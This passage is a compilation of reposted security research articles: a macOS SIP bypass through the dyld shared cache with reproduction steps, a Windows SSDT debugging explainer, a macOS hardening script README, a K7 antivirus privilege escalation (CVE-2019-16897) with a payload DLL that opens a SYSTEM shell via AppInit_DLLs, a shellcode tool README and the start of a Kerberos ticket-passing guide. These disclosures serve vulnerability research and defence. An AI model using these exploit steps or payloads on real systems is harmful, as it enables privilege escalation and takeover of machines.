* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 2.1
    frame #0: 0x00007fff5f32b8ea libsystem_sandbox.dylib`rootless_check_trusted
libsystem_sandbox.dylib`rootless_check_trusted:
->  0x7fff5f32b8ea <+0>: pushq %rbp
    0x7fff5f32b8eb <+1>: movq %rsp, %rbp
    0x7fff5f32b8ee <+4>: movl $0xffffffff, %esi ; imm = 0xFFFFFFFF
    0x7fff5f32b8f3 <+9>: xorl %edx, %edx
Target 0: (update_dyld_shared_cache) stopped.
(lldb) print (char*)$rdi
(char *) $0 = 0x00007ffeefbff171 "/private/var/db/dyld/"
(lldb) finish
Process 457 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step out
    frame #0: 0x00000001000433da update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) + 54
update_dyld_shared_cache`isProtectedBySIP:
->  0x1000433da <+54>: testl %eax, %eax
    0x1000433dc <+56>: sete %al
    0x1000433df <+59>: addq $0x8, %rsp
    0x1000433e3 <+63>: popq %rbx
Target 0: (update_dyld_shared_cache) stopped.
(lldb) print $rax
(unsigned long) $1 = 1

Looking around with a little helper (under the assumption that it doesn't behave differently because it doesn't have the entitlement), it looks like only a small part of the SIP-protected directories show up as protected when you check with rootless_check_trusted():

bash-3.2# cat rootless_test.c
#include <stdio.h>

int rootless_check_trusted(char *);

int main(int argc, char **argv) {
    int res = rootless_check_trusted(argv[1]);
    printf("rootless status for '%s': %d (%s)\n", argv[1], res, (res == 0) ? "PROTECTED" : "MALLEABLE");
}
bash-3.2# ./rootless_test /
rootless status for '/': 1 (MALLEABLE)
bash-3.2# ./rootless_test /System
rootless status for '/System': 0 (PROTECTED)
bash-3.2# ./rootless_test /System/
rootless status for '/System/': 0 (PROTECTED)
bash-3.2# ./rootless_test /System/Library
rootless status for '/System/Library': 0 (PROTECTED)
bash-3.2# ./rootless_test /System/Library/Assets
rootless status for '/System/Library/Assets': 1 (MALLEABLE)
bash-3.2# ./rootless_test /System/Library/Caches
rootless status for '/System/Library/Caches': 1 (MALLEABLE)
bash-3.2# ./rootless_test /System/Library/Caches/com.apple.kext.caches
rootless status for '/System/Library/Caches/com.apple.kext.caches': 1 (MALLEABLE)
bash-3.2# ./rootless_test /usr
rootless status for '/usr': 0 (PROTECTED)
bash-3.2# ./rootless_test /usr/local
rootless status for '/usr/local': 1 (MALLEABLE)
bash-3.2# ./rootless_test /private
rootless status for '/private': 1 (MALLEABLE)
bash-3.2# ./rootless_test /private/var/db
rootless status for '/private/var/db': 1 (MALLEABLE)
bash-3.2# ./rootless_test /private/var/db/dyld/
rootless status for '/private/var/db/dyld/': 1 (MALLEABLE)
bash-3.2# ./rootless_test /sbin
rootless status for '/sbin': 0 (PROTECTED)
bash-3.2# ./rootless_test /Applications/Mail.app/
rootless status for '/Applications/Mail.app/': 0 (PROTECTED)
bash-3.2#

Perhaps rootless_check_trusted() limits its trust to paths that are writable exclusively using installer entitlements like com.apple.rootless.install, or something like that? That's the impression I get when testing different entries from /System/Library/Sandbox/rootless.conf - the entries with no whitelisted specific entitlement show up as protected, the ones with a whitelisted specific entitlement show up as malleable. rootless_check_trusted() checks for the "file-write-data" permission through the MAC syscall, but I haven't looked in detail at how the policy actually looks.

(By the way, looking at update_dyld_shared_cache, I'm not sure whether it would actually work if the requireDylibsBeRootlessProtected flag is true - it looks like addIfMachO() would never add any libraries to dylibsForCache because `sipProtected` is fixed to `false` and the call to isProtectedBySIP() is commented out?)
In theory, this means it's possible to inject a modified version of a library into the dyld cache using either the -root or the -overlay flag of update_dyld_shared_cache, reboot, and then run an entitled binary that will use the modified library. However, there are (non-security) checks that make this annoying:

- When loading libraries, loadPhase5load() checks whether the st_ino and st_mtime of the on-disk library match the ones embedded in the dyld cache at build time.
- Recently, dyld started ensuring that the libraries are all on the "boot volume" (the path specified with "-root", or "/" if no root was specified).

The inode number check means that it isn't possible to just create a malicious copy of a system library, run `update_dyld_shared_cache -overlay`, and reboot to use the malicious copy; the modified library will have a different inode number. I don't know whether HFS+ reuses inode numbers over time, but on APFS, not even that is possible; inode numbers are monotonically incrementing 64-bit integers.

Since root (and even normal users) can mount filesystem images, I decided to create a new filesystem with appropriate inode numbers. I think HFS probably can't represent the full range of inode numbers that APFS can have (and that seem to show up on volumes that have been converted from HFS+ - that seems to result in inode numbers like 0x0fffffff00001666), so I decided to go with an APFS image. Writing code to craft an entire APFS filesystem would probably take quite some time, and the public open-source APFS implementations seem to be read-only, so I'm first assembling a filesystem image normally (create filesystem with newfs_apfs, mount it, copy files in, unmount), then renumbering the inodes. By storing files in the right order, I don't even need to worry about allocating and deallocating space in tree nodes and such - all replacements can be performed in-place.

My PoC patches the cached version of csr_check() from libsystem_kernel.dylib so that it always returns zero, which causes the userspace kext loading code to ignore code signing errors. To reproduce:

- Ensure that SIP is on.
- Ensure that you have at least something like 8GiB of free disk space.
- Unpack the attached dyld_sip.tar (as normal user).
- Run ./collect.sh (as normal user). This should take a couple minutes, with more or less continuous status updates. At the end, it should say "READY" after mounting an image to /private/tmp/L. (If something goes wrong here and you want to re-run the script, make sure to detach the volume if the script left it attached - check "hdiutil info".)
- As root, run "update_dyld_shared_cache -force -root /tmp/L".
- Reboot the machine.
- Build an (unsigned) kext from source. I have attached source code for a sample kext as testkext.tar - you can unpack it and use xcodebuild -, but that's just a simple "hello world" kext, you could also use anything else.
- As root, copy the kext to /tmp/.
- As root, run "kextutil /tmp/[...].kext".
You should see something like this:

bash-3.2# cp -R testkext/build/Release/testkext.kext /tmp/ && kextutil /tmp/testkext.kext
Kext with invalid signatured (-67050) allowed: <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" }
Code Signing Failure: code signature is invalid
Disabling KextAudit: SIP is off
Invalid signature -67050 for kext <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" }
bash-3.2# dmesg|tail -n1
test kext loaded
bash-3.2# kextstat | grep test
120 0 0xffffff7f82a50000 0x2000 0x2000 net.thejh.test.testkext (1) A24473CD-6525-304A-B4AD-B293016E5FF0 <5>
bash-3.2#

Miscellaneous notes:

- It looks like there's an OOB kernel write in the dyld shared cache pager; but AFAICS that isn't reachable unless you've already defeated SIP, so I don't think it's a vulnerability: vm_shared_region_slide_page_v3() is used when a page from the dyld cache is being paged in. It essentially traverses a singly-linked list of relocations inside the page; the offset of the first relocation (iow the offset of the list head) is stored permanently in kernel memory when the shared cache is initialized. As far as I can tell, this function is missing bounds checks; if either the starting offset or the offset stored in the page being paged in points outside the page, a relocation entry will be read from OOB memory, and a relocated address will conditionally be written back to the same address.
- There is a check `rootPath != "/"` in update_dyld_shared_cache; but further up is this:

    // canonicalize rootPath
    if ( !rootPath.empty() ) {
        char resolvedPath[PATH_MAX];
        if ( realpath(rootPath.c_str(), resolvedPath) != NULL ) {
            rootPath = resolvedPath;
        }
        // <rdar://problem/33223984> when building closures for boot volume, pathPrefixes should be empty
        if ( rootPath == "/" ) {
            rootPath = "";
        }
    }

  So as far as I can tell, that condition is always true, which means that when an overlay path is specified with `-overlay`, the cache is written to the root even though the code looks as if the cache is intended to be written to the overlay.
- Some small notes regarding the APFS documentation at <https://developer.apple.com/support/downloads/Apple-File-System-Reference.pdf>:
  - The typedef for apfs_superblock_t is missing.
  - The documentation claims that APFS_TYPE_DIR_REC keys are j_drec_key_t, but actually they can be j_drec_hashed_key_t.
  - The documentation claims that o_cksum is "The Fletcher 64 checksum of the object", but actually APFS requires that the fletcher64 checksum of all data behind the checksum, concatenated with the checksum, is zero. (In other words, you cut out the checksum field at the start, append it at the end, then run fletcher64 over the buffer, and then you have to get an all-zeroes checksum.)
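To make that last point concrete, here is a sketch of the described verification in C (assuming the mod-0xFFFFFFFF, 32-bit-word variant of fletcher64 used by APFS and a little-endian host):

#include <stdint.h>
#include <string.h>

/* Plain fletcher64 over little-endian 32-bit words (mod-0xFFFFFFFF variant). */
static uint64_t fletcher64(const uint8_t *buf, size_t len)
{
    uint64_t sum1 = 0, sum2 = 0;
    for (size_t i = 0; i + 4 <= len; i += 4) {
        uint32_t w;
        memcpy(&w, buf + i, 4);            /* assumes little-endian host */
        sum1 = (sum1 + w) % 0xFFFFFFFFull;
        sum2 = (sum2 + sum1) % 0xFFFFFFFFull;
    }
    return (sum2 << 32) | sum1;
}

/* Verify an APFS object block: cut the 8-byte o_cksum field from the
 * start, append it at the end, and the fletcher64 of the result must
 * be all zeroes. */
static int apfs_block_checksum_ok(const uint8_t *block, size_t blocksize)
{
    uint8_t tmp[4096];
    if (blocksize < 8 || blocksize > sizeof(tmp))
        return 0;
    memcpy(tmp, block + 8, blocksize - 8);   /* data behind the checksum */
    memcpy(tmp + blocksize - 8, block, 8);   /* checksum appended at the end */
    return fletcher64(tmp, blocksize) == 0;
}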
Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47708.zip

Sursa: https://www.exploit-db.com/exploits/47708

20. A Glimpse into SSDT inside Windows x64 Kernel

What is SSDT

The System Service Dispatch Table, or SSDT, is simply an array of addresses of kernel routines on 32-bit operating systems, or an array of relative offsets to the same routines on 64-bit operating systems. The SSDT is the first member of the Service Descriptor Table kernel memory structure, as shown below:

typedef struct tagSERVICE_DESCRIPTOR_TABLE {
    SYSTEM_SERVICE_TABLE nt;      // effectively a pointer to the Service Dispatch Table (SSDT) itself
    SYSTEM_SERVICE_TABLE win32k;
    SYSTEM_SERVICE_TABLE sst3;    // pointer to a memory address that contains how many routines are defined in the table
    SYSTEM_SERVICE_TABLE sst4;
} SERVICE_DESCRIPTOR_TABLE;

SSDTs used to be hooked by AVs as well as rootkits that wanted to hide files, registry keys, network connections, etc. Microsoft introduced PatchGuard for x64 systems to fight SSDT modifications by BSOD'ing the system.

In Human Terms

When a program in user space calls a function, say CreateFile, code execution is eventually transferred to ntdll!NtCreateFile and, via a syscall, to the kernel routine nt!NtCreateFile. A syscall is merely an index into the System Service Dispatch Table (SSDT), which contains an array of pointers (for 32-bit OSes) or relative offsets into the Service Dispatch Table (for 64-bit OSes) for all critical system APIs like ZwCreateFile, ZwOpenFile and so on. Below is a simplified diagram that shows how offsets in the SSDT KiServiceTable are converted to absolute addresses of corresponding kernel routines:

[image: SSDT offset-to-absolute-address translation]

Effectively, syscalls and the SSDT (KiServiceTable) work together as a bridge between userland API calls and their corresponding kernel routines, allowing the kernel to know which routine should be executed for a given syscall that originated in user space.

Service Descriptor Table

In WinDbg, we can check the Service Descriptor Table structure KeServiceDescriptorTable as shown below. Note that the first member is recognized as KiServiceTable - this is a pointer to the SSDT itself - the dispatch table (or simply an array) containing all those pointers/offsets:

0: kd> dps nt!keservicedescriptortable L4
fffff801`9210b880  fffff801`9203b470 nt!KiServiceTable
fffff801`9210b888  00000000`00000000
fffff801`9210b890  00000000`000001ce
fffff801`9210b898  fffff801`9203bbac nt!KiArgumentTable

Let's try and print out a couple of values from the SSDT:

0: kd> dd /c1 KiServiceTable L2
fffff801`9203b470  fd9007c4
fffff801`9203b474  fcb485c0

As mentioned earlier, on x64, which is what I'm running in my lab, the SSDT contains relative offsets to kernel routines.
In order to get the absolute address for a given offset, the following formula needs to be applied:

RoutineAbsoluteAddress = KiServiceTableAddress + (routineOffset >>> 4)

Using the above formula and the first offset fd9007c4 we got from the KiServiceTable, we can work out that this offset is pointing to nt!NtAccessCheck:

0: kd> u KiServiceTable + (0xfd9007c4 >>> 4)
nt!NtAccessCheck:
fffff801`91dcb4ec 4c8bdc           mov r11,rsp
fffff801`91dcb4ef 4883ec68         sub rsp,68h
fffff801`91dcb4f3 488b8424a8000000 mov rax,qword ptr [rsp+0A8h]
fffff801`91dcb4fb 4533d2           xor r10d,r10d

We can confirm it if we try to disassemble nt!NtAccessCheck - the routine address (fffff801`91dcb4ec) and the first instruction (mov r11, rsp) of the above and below commands match:

0: kd> u nt!NtAccessCheck L1
nt!NtAccessCheck:
fffff801`91dcb4ec 4c8bdc           mov r11,rsp

If we refer back to the original drawing on how SSDT offsets are converted to absolute addresses, we can redraw it with specific values for syscall 0x1.

Finding a Dispatch Routine for a Given Userland Syscall

As a simple exercise, given a known syscall number, we can try to work out what kernel routine will be called once that syscall is issued. Let's load the debugging symbols for the ntdll module:

.reload /f ntdll.dll
lm ntdll

Let's now find the syscall for ntdll!NtCreateFile:

0: kd> u ntdll!ntcreatefile L2

...we can see the syscall is 0x55.

Offsets in the KiServiceTable are 4 bytes in size, so we can work out the offset for syscall 0x55 by looking at the value the KiServiceTable holds at position 0x55:

0: kd> dd /c1 kiservicetable+4*0x55 L1
fffff801`9203b5c4  01fa3007

We see from the above that the offset for NtCreateFile is 01fa3007. Using the formula discussed previously for working out the absolute routine address, we confirm that we're looking at the nt!NtCreateFile kernel routine that will be called once ntdll!NtCreateFile issues the 0x55 syscall:

0: kd> u kiservicetable + (01fa3007>>>4) L1
nt!NtCreateFile:
fffff801`92235770 4881ec88000000   sub rsp,88h

Let's redraw the earlier diagram once more for the syscall 0x55 for ntdll!NtCreateFile.

Finding Address of All SSDT Routines

As another exercise, we could loop through all items in the service dispatch table and print absolute addresses for all routines defined in the dispatch table:

.foreach /ps 1 /pS 1 ( offset {dd /c 1 nt!KiServiceTable L poi(keservicedescriptortable+0x10) }){ dp kiservicetable + ( offset >>> 4 ) L1 }

Nice, but not very human readable. We can update the loop a bit and print out the API names associated with those absolute addresses:

0: kd> .foreach /ps 1 /pS 1 ( offset {dd /c 1 nt!KiServiceTable L poi(nt!KeServiceDescriptorTable+10)}){ r $t0 = ( offset >>> 4) + nt!KiServiceTable; .printf "%p - %y\n", $t0, $t0 }
fffff80191dcb4ec - nt!NtAccessCheck (fffff801`91dcb4ec)
fffff80191cefccc - nt!NtWorkerFactoryWorkerReady (fffff801`91cefccc)
fffff8019218df1c - nt!NtAcceptConnectPort (fffff801`9218df1c)
fffff801923f8848 - nt!NtMapUserPhysicalPagesScatter (fffff801`923f8848)
fffff801921afc10 - nt!NtWaitForSingleObject (fffff801`921afc10)
fffff80191e54010 - nt!NtCallbackReturn (fffff801`91e54010)
fffff8019213cf60 - nt!NtReadFile (fffff801`9213cf60)
fffff801921b2e80 - nt!NtDeviceIoControlFile (fffff801`921b2e80)
fffff80192212dc0 - nt!NtWriteFile (fffff801`92212dc0)
.....cut for brevity.....
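The same arithmetic, expressed as a small C sketch (a hypothetical helper; it assumes you can already read the table, e.g. from a debugger or a driver, and that signed right shift is arithmetic, which matches WinDbg's >>> operator):

#include <stdint.h>

/* Decode one SSDT entry on x64: the low 4 bits of the packed value
 * encode the argument count, the remaining bits are a SIGNED offset
 * from the base of KiServiceTable - hence the sign-preserving shift. */
static uintptr_t ssdt_routine_address(const int32_t *KiServiceTable, uint32_t syscall_index)
{
    int32_t packed = KiServiceTable[syscall_index];    /* e.g. 0x01fa3007 for syscall 0x55 */
    return (uintptr_t)KiServiceTable + (packed >> 4);  /* KiServiceTable + (offset >>> 4) */
}

For syscall 0x55, this reproduces the nt!NtCreateFile address computed above.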
References

- The Quest for the SSDTs - The much talked about kernel data structures (www.codeproject.com)
- .printf - Windows drivers - The .printf token behaves like the printf statement in C. (docs.microsoft.com)
- .foreach - Windows drivers - The .foreach token parses the output of one or more debugger commands and uses each value in this output as the input to one or more additional commands. (docs.microsoft.com)

Sursa: https://ired.team/miscellaneous-reversing-forensics/windows-kernel/glimpse-into-ssdt-in-windows-x64-kernel
21. macOS Lockdown (mOSL)

Bash script to audit and fix macOS Catalina (10.15.x) security settings.

Inspired by and based on Lockdown by Patrick Wardle and osxlockdown by Scott Piper.

Warnings

- mOSL is being rewritten in Swift and the Bash version will be deprecated. See: "The Future of mOSL".
- Always run the latest release, not the code in master!
- This script will only ever support the latest macOS release.
- This script requires your password to invoke some commands with sudo.

brew tap: 0xmachos/homebrew-mosl

To install mOSL via brew execute:

brew tap 0xmachos/homebrew-mosl
brew install mosl

mOSL will then be available as: Lockdown

Threat Model(ish)

The main goal is to enforce already secure defaults and apply more strict non-default options. It aims to reduce attack surface, but it is pragmatic in this pursuit. The author utilises Bluetooth for services such as Handoff, so it is left enabled. There is no specific focus on enhancing privacy. Finally, mOSL will not protect you from the FSB, MSS, DGSE, or FSM.

Full Disk Access Permission

In macOS Mojave and later certain application data is protected by the OS. For example, if Example.app wishes to access Contacts.app data, Example.app must be given explicit permission via System Preferences > Security & Privacy > Privacy. However, some application data cannot be accessed via a specific permission. Access to this data requires the Full Disk Access permission.

mOSL requires that Terminal.app be given the Full Disk Access permission. It needs this permission to audit/fix the following settings:

- disable mail remote content
- disable auto open safe downloads

These are currently the only settings which require Full Disk Access. It is not possible to programmatically get or prompt for this permission; it must be manually given by the user. To give Terminal.app Full Disk Access:

System Preferences > Security & Privacy > Privacy > Full Disk Access > Add Terminal.app

Once you are done with mOSL you can revoke Full Disk Access for Terminal.app. There's a small checkbox next to Terminal which you can uncheck to revoke the permission without entirely removing Terminal.app from the list.

More info on macOS's new permission model:

- Working with Mojave's Privacy Protection by Howard Oakley
- TCC Round Up by Carl Ashley
- WWDC 2018 Session 702 Your Apps and the Future of macOS Security

Verification

The executable Lockdown file can be verified with Minisign:

minisign -Vm Lockdown -P RWTiYbJbLl7q6uQ70l1XCvGExizUgEBNDPH0m/1yMimcsfgh542+RDPU

Install via brew: brew install minisign

Usage

$ ./Lockdown

Audit or Fix macOS security settings🔒🍎

Usage: ./Lockdown [list | audit {setting_index} | fix {setting_index} | debug]

  list       - List settings that can be audited/fixed
  audit      - Audit the status of all or chosen setting(s) (Does NOT change settings)
  fix        - Attempt to fix all or chosen setting(s) (Does change settings)
  fix-force  - Same as 'fix' however bypasses user confirmation prompt (Can be used to invoke Lockdown from other scripts)
  debug      - Print debug info for troubleshooting

Settings

See Commands.md for an easy-to-read list of commands used to audit/fix the settings below.
Settings that can be audited/fixed:

[0]  enable automatic system updates
[1]  enable automatic app store updates
[2]  enable gatekeeper
[3]  enable firewall
[4]  enable admin password preferences
[5]  enable terminal secure entry
[6]  enable sip
[7]  enable filevault
[8]  disable firewall builtin software
[9]  disable firewall downloaded signed
[10] disable ipv6
[11] disable mail remote content
[12] disable remote apple events
[13] disable remote login
[14] disable auto open safe downloads
[15] set airdrop contacts only
[16] set appstore update check daily
[17] set firmware password
[18] check kext loading consent
[19] check efi integrity
[20] check if standard user

Sursa: https://github.com/0xmachos/mOSL
22. Anti-virus Exploitation: Local Privilege Escalation in K7 Security (CVE-2019-16897)

Anti-virus Exploitation

Hey guys, long time no article! Over the past few months, I have been looking into exploitation of anti-viruses via logic bugs. I will briefly discuss the approach towards performing vulnerability research of these security products, using the vulnerability I discovered in K7 Security as an example.

Disclaimer: I do not claim to know everything about vulnerability research nor exploitation, so if there are errors in this article, please let me know.

Target Selection

Security products such as anti-viruses are an attractive target (at least for me) because they operate in a trusted and privileged context in both the kernel, as a driver, and userland, as a privileged service. This means that they have the ability to facilitate potential escalation of privilege or otherwise access privileged functionality. They also have a presence in the low-privileged space of the operating system. For example, there may exist a UI component with which the user can interact, sometimes allowing options to be changed such as enabling/disabling anti-virus, adding directory or file exclusions, and scanning files for malware. Anti-viruses must also access and perform operations on operating system objects to detect malware, such as reading files, registry keys, memory, etc., as well as being able to perform privileged actions to keep the system in a protected state no matter the situation. It is between this trusted, high privilege space and the untrusted, low privileged space where interesting things occur.

Attack Surface

As aforementioned, anti-viruses live on both sides of the privilege boundary as shown in the following diagram:

[image: Untitled Diagram(1).jpg]

Whatever crosses the line between high and low privilege represents the attack surface. Let's look at how this diagram can be interpreted. The user interface shares common operations with the service process, which is expected. If the user wants to carry out a privileged action, the service will do it on its behalf, assuming that security checks are passed. If the user wishes to change a setting, they open the user interface and click a button. This is communicated to the service process via some form of inter-process communication (IPC), which will perform the necessary actions, e.g. the anti-virus stores its configuration in the registry and therefore the service will open the relevant registry key and modify some data. Keep in mind that the registry key is stored in the HKEY_LOCAL_MACHINE hive, which is in high privilege space, thus requiring a high privilege process to modify its data. So the user, from low privilege, is able to indirectly modify a high privilege object.

One more example. A user can scan for malware through the user interface (of course, what good is an anti-virus if they disallow the user from scanning for malware?). A simple, benign operation, what could go wrong? Since it is the responsibility of the service process to perform the malware scan, the interface communicates the information to the service process to target a file. It must interact with the file in order to perform the scan, i.e. it must locate the file on disk and read its content.
If, while the file data has been read and is being scanned for malware, the anti-virus does not lock the file on disk, it is possible for the malware to be replaced with a symbolic link pointing to a file in a high privileged directory (yes, it is possible). Let's use notepad.exe. When the scan is completed and the file has been determined to be malware, the service process can delete the file. However, the malware has been replaced with a link to notepad.exe! If the anti-virus does not detect and reject the symbolic link, it will delete notepad.exe without question. This is an example of a Time of Check to Time of Use (TOCTOU) race condition bug. Again, the user, from low privilege, is able to indirectly modify a high privilege object because of the service process acting as a broker. A sketch of this vulnerable pattern is shown below.
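In code, the vulnerable pattern could look like the following (a sketch, not K7's implementation; POSIX calls are used for brevity, and scan_for_malware() is a hypothetical stand-in):

#include <stdio.h>

/* Stand-in scanner so the sketch is self-contained: flags everything. */
static int scan_for_malware(FILE *f) { (void)f; return 1; }

/* Time-of-check/time-of-use: the path is resolved twice. Between the
 * fopen() (check) and the remove() (use), a low privileged user can
 * swap a directory component of `path` for a symbolic link into a
 * protected directory. The second resolution follows the link, and a
 * service running with high privileges deletes a file it never
 * scanned. */
int scan_and_quarantine(const char *path)
{
    FILE *f = fopen(path, "rb");           /* time of check */
    if (!f)
        return -1;
    int malicious = scan_for_malware(f);   /* attacker wins the race here */
    fclose(f);
    if (malicious)
        remove(path);                      /* time of use: path re-resolved */
    return 0;
}

A safer design keeps the handle open and operates on the handle, or re-validates that the path still resolves to the file that was scanned, instead of resolving the path a second time.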
Exploitation

This vulnerability allows a low privilege user to modify (almost) arbitrary registry data through the anti-virus's settings. However, a low privileged user (non administrator) should not be able to change the anti-virus's settings.

Bypassing Administrative Checks

To narrow down how this administration check is performed, procmon can be used to identify operating system activity as the settings page is accessed again. This will trigger the anti-virus to recheck the administrative status of the current user while it interacts with the operating system as it is being logged. Of course, since we are low privilege and procmon requires high privilege, it is not practical in a real environment. However, because we control the testing environment, we can allow procmon to run as we have access to an administrator account. Setting procmon to filter by K7TSMain as the process name will capture activity performed by the user interface process. When procmon starts to log, attempting to access the settings page again in the UI will trigger procmon to instantly show results:

[image: procmon admin check.png]

It can be seen that the anti-virus stores the administrative check in the registry in AdminNonAdminIsValid. Looking at the value in the Event Properties window shows that it returned 0, meaning that non administrator users are not allowed. But there is a slight problem here. Bonus points if you can spot it.

Now that we know where the check is being performed, the next step is bypassing it. procmon shows that the process is running in low privilege space as indicated by the user and the medium integrity level, meaning that we own the process. If it is not protected, we can simply hook the RegQueryValueExA function and modify the return value.

[image: Attaching to K7TSMain.png]

Attempting to attach to the K7TSMain.exe process using x32dbg is allowed! The breakpoint on RegQueryValueExA has been set for when we try to access the settings page again.

[image: Triggering RegQueryValueExA breakpoint.png]

x32dbg catches the breakpoint when the settings page is clicked. The value name being queried is ProductType but we want AdminNonAdminIsValid, so continuing on will trigger the next breakpoint:

[image: Breakpoint on AdminNonAdminIsValid.png]

Now we can see AdminNonAdminIsValid. To modify the return value, we can allow the function to run until return. However, the calling function looks like a wrapper for RegQueryValueExA, so continuing again until return reveals the culprit function that performs the check:

[image: Admin check function.png]

There is an obvious check there for the value 1; however, the current returned value for the registry data is 0. This decides the return value of this function, so we can either change [esp+4] or change the return value to bypass the check:

[image: Bypass admin check.png]

Intercepting Inter-process Communication

Multiple inter-process communication methods are available on Windows, such as mailslots, file mapping, COM, and named pipes. We must figure out which is implemented in the product to be able to analyse the protocol. An easy way to do this is by using API Monitor to log select function calls made by the process. When we do this and then apply a changed setting, we can see references to named pipe functions:

[image: API Monitor showing named pipe functions]

Note that the calling module is K7AVOptn.dll instead of K7TSMain.exe. If we have a look at the data being communicated through TransactNamedPipe, we can see some interesting information:

[image: TransactNamedPipe input buffer]

The first thing that pops out is that it looks like a list of extension names (.ocx, .exe, .com) separated with | where some have wildcard matching. This could be a list of extensions to scan for malware. If we have a look at the registry where the anti-virus stores its configuration, we can see something similar under the value ScanExtensions in the RTFileScanner key:

[image: ScanExtensions registry value]

Continuing down the list of calls, one of them contains some very intriguing data:

[image: TransactNamedPipe registry data]

It looks as though the anti-virus is applying values by specifying (privileged) registry keys and their values by their full key path. The next obvious step is to see if changing one of the keys and their values will work. This can be done by breakpointing on the TransactNamedPipe function in x32dbg:

[image: TransactNamedPipe breakpoint]

Once here, locate the input buffer in the second argument and alter the data to add or change a key in the HKEY_LOCAL_MACHINE hive like so:

[image: modified input buffer]

If it is possible to change this registry key's values, high privileged processes will be forced to load the DLLs listed in AppInit_DLLs, i.e. one that we control. The LoadAppInit_DLLs value must also be set to 1 (it is 0 by default) to enable this functionality. The result:

[image: AppInit_DLLs written to the registry]

Triggering the Payload

You may have noticed that the registry key resides within Wow6432Node, which is the 32-bit counterpart of the registry. This is because the product is 32-bit and so Windows will automatically redirect registry changes. In 64-bit Windows, processes are usually 64-bit and so the chance of loading the payload DLL through AppInit_DLLs is unlikely. A reliable way is to make use of the anti-virus, because it is 32-bit, assuming a privileged component can be launched. The easiest way to do this is to restart the machine because it will reload all of the anti-virus's processes; however, it is not always practical nor is it clean. Clicking around the UI reveals that the update function runs K7TSHlpr.exe under the NT AUTHORITY\SYSTEM user:

[image: K7TSHlpr.exe running as SYSTEM]

As it is a 32-bit application, Windows will load our AppInit_DLLs DLL into the process space.

[image: payload DLL loaded into K7TSHlpr.exe]

Using system("cmd") as the payload will prompt the user with an interactive session in the context of the NT AUTHORITY\SYSTEM account via the UI0Detect service. Selecting to view the message brings up the following:

[image: interactive SYSTEM shell]

We have root!
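For completeness, here is a minimal sketch of the kind of payload DLL such an AppInit_DLLs entry would point at (hypothetical code mirroring the system("cmd") payload described above, not the code from the advisory):

/* payload.c - build as a 32-bit DLL (e.g. cl /LD payload.c) so the
 * 32-bit K7 processes load it via AppInit_DLLs. DllMain runs in every
 * process that loads the DLL; the spawned shell inherits the host
 * process token - NT AUTHORITY\SYSTEM when loaded by K7TSHlpr.exe. */
#include <windows.h>
#include <stdlib.h>

BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved)
{
    (void)hinst;
    (void)reserved;
    if (reason == DLL_PROCESS_ATTACH)
        system("cmd");  /* interactive SYSTEM session, surfaced via UI0Detect */
    return TRUE;
}

Blocking inside DllMain like this is poor practice in general (it runs under the loader lock), but it is sufficient for a proof of concept.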
Automated Exploit

Link to my GitHub for the advisory and an automated exploit.

Sursa: https://0x00sec.org/t/anti-virus-exploitation-local-privilege-escalation-in-k7-security-cve-2019-16897/17655

23. Sickle
Sickle is a payload development tool originally created to aid me in crafting shellcode; however, it can be used in crafting payloads for other exploit types as well (non-binary). Although the current modules are mostly aimed towards assembly, this tool is not limited to shellcode.

Sickle can aid in the following:

- Identifying instructions resulting in bad characters when crafting shellcode
- Formatting output in various languages (python, perl, javascript, etc.)
- Accepting bytecode via STDIN and formatting it
- Executing shellcode in both Windows and Linux environments
- Diffing two binaries (hexdump, raw, asm, byte)
- Disassembling shellcode into assembly language (ARM, x86, etc.)
- Shellcode extraction from raw bins (nasm sc.asm -o sc)

Quick failure check

A task I found myself doing repetitively was compiling assembler source code, extracting the shellcode, placing it into a wrapper, and testing it. If it was a bad run, the process would be repeated until successful. Sickle takes care of placing the shellcode into a wrapper for quick testing. (Works on Windows and Unix systems.)

Recreating shellcode

Sometimes you find a piece of shellcode that's fluent in its execution and you want to recreate it yourself to understand its underlying mechanisms. Sickle can help you compare the original shellcode to your "recreated" version. If you're not crafting shellcode and just need two binfiles to be the same, this feature can also help verify that files are identical byte by byte (multiple modes).

Disassembly

Sickle can also take a binary file and convert the extracted opcodes (shellcode) to machine instructions. Keep in mind this works with raw opcodes (-r) and STDIN (-r -) as well. In the following example I am converting a reverse shell designed by Stephen Fewer to assembly.

Bad character identification

Module Based Design

This tool was originally designed as one big script; however, recently when a change needed to be made to the script I had to relearn my own code... In order to avoid this in the future I've decided to keep all modules under the "modules" directory (default module: format). If you prefer the old design, I have kept a copy under the Documentation directory.

~# sickle.py -l

Name          Description
----          -----------
diff          Compare two binaries / shellcode(s). Supports hexdump, byte, raw, and asm modes
run           Execute shellcode on either windows or unix
format        Format bytecode into desired format / language
badchar       Generate bad characters in respective format
disassemble   Disassemble bytecode in respective architecture
pinpoint      Pinpoint where in shellcode bad characters occur

~# sickle -i -m diff

Options for diff

Name      Required   Description
----      --------   -----------
BINFILE   yes        Additional binary file needed to perform diff
MODE      yes        hexdump, byte, raw, or asm

Description: Compare two binaries / shellcode(s). Supports hexdump, byte, raw, and asm modes

Sursa: https://github.com/wetw0rk/Sickle
24. Practical Guide to Passing Kerberos Tickets From Linux

Nov 21, 2019

The goal of this post is to be a practical guide to passing Kerberos tickets from a Linux host. In general, penetration testers are very familiar with using Mimikatz to obtain cleartext passwords or NT hashes and utilize them for lateral movement. At times we may find ourselves in a situation where we have local admin access to a host, but are unable to obtain either a cleartext password or NT hash of a target user. Fear not, in many cases we can simply pass a Kerberos ticket in place of passing a hash. This post is meant to be a practical guide. For a deeper understanding of the technical details and theory, see the resources at the end of the post.

Tools

To get started we will first need to set up some tools. All have setup information on their GitHub pages.

- Impacket: https://github.com/SecureAuthCorp/impacket
- pypykatz: https://github.com/skelsec/pypykatz
- Kerberos client
  - RPM based: yum install krb5-workstation
  - Debian based: apt install krb5-user
- procdump: https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
